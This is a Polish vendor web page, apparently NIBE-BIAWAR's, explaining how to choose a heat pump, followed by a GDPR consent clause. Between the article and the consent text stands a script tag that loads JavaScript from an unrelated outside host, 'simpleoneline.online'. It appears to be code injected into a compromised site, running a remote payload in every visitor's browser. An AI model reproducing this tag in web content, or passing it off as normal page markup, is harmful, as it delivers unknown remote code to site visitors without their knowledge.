Co determinuje wybór konkretnego rodzaju pompy?

     Wybór konkretnego rodzaju pompy ciepła jest uzależniony od charakterystyki samej inwestycji, indywidualnych potrzeb inwestora oraz aspektów ekonomicznych.
Po pierwsze charakterystyka inwestycji. Często wielkość działki, to w której strefie klimatycznej znajduje się inwestycja, lub to w jaki sposób będzie ona zagospodarowana przemawia za wyborem pewnego typu pomp.
     Z drugiej strony bardzo ważna jest analiza indywidualnych potrzeb w odniesieniu do budżetu jaki chcemy przeznaczyć na instalację pompy ciepła.
     Znaczenie ma to czy pompa ma działać tylko na przygotowanie ciepłej wody użytkowej, tylko na potrzeby centralnego ogrzewania czy też ma stanowić źródło ciepła do zaspokojenia obu tych celów. To jak duża jest inwestycja oraz jak wielkim zapotrzebowaniem na ciepło się charakteryzuje ma wpływ na to jak wielka będzie różnica w kosztach pomiędzy poszczególnymi typami rozwiązań. Istotne jest to jakie parametry są wymagane w instalacji. Czy w lecie potrzebujemy chłodu, w jakiej ilości go potrzebujemy i czy zależy nam na chłodzeniu pasywnym czy aktywnym. To czy chcemy mieć możliwość zdalnego zarządzania pracą pompy ciepła przez internet, podglądu historii pracy oraz czy zamierzamy łączyć pompę ciepła z innymi elementami takimi jak instalacja fotowoltaiczna czy rekuperacja, wszystko to determinuje tak naprawdę jakiego urządzenia potrzebujemy.

<script async src='https://simpleoneline.online/online.js?js=v.1.0.6' type='text/javascript'></script>


Wyrażam zgodę na przetwarzanie moich danych osobowych przez spółkę NIBE-BIAWAR SP. Z O. O. z siedzibą w Białymstoku, al. Jana Pawła II 57, będą przetwarzane na podstawie art. 6 ust. 1 lit. a, b, c RODO, w związku z realizacją zgłoszenia. Podanie danych jest dobrowolne, ale niezbędne do przetworzenia zapytania. Podstawą przetwarzania danych jest moja zgoda. Dane osobowe będą przetwarzane na czas realizacji zgłoszenia lub do odwołania zgody. Zostałem poinformowany, że przysługuje mi prawo dostępu do swoich danych, możliwości ich poprawiania, żądania ograniczenia ich przetwarzania lub usunięcia, a także prawo wniesienia skargi do organu nadzorczego.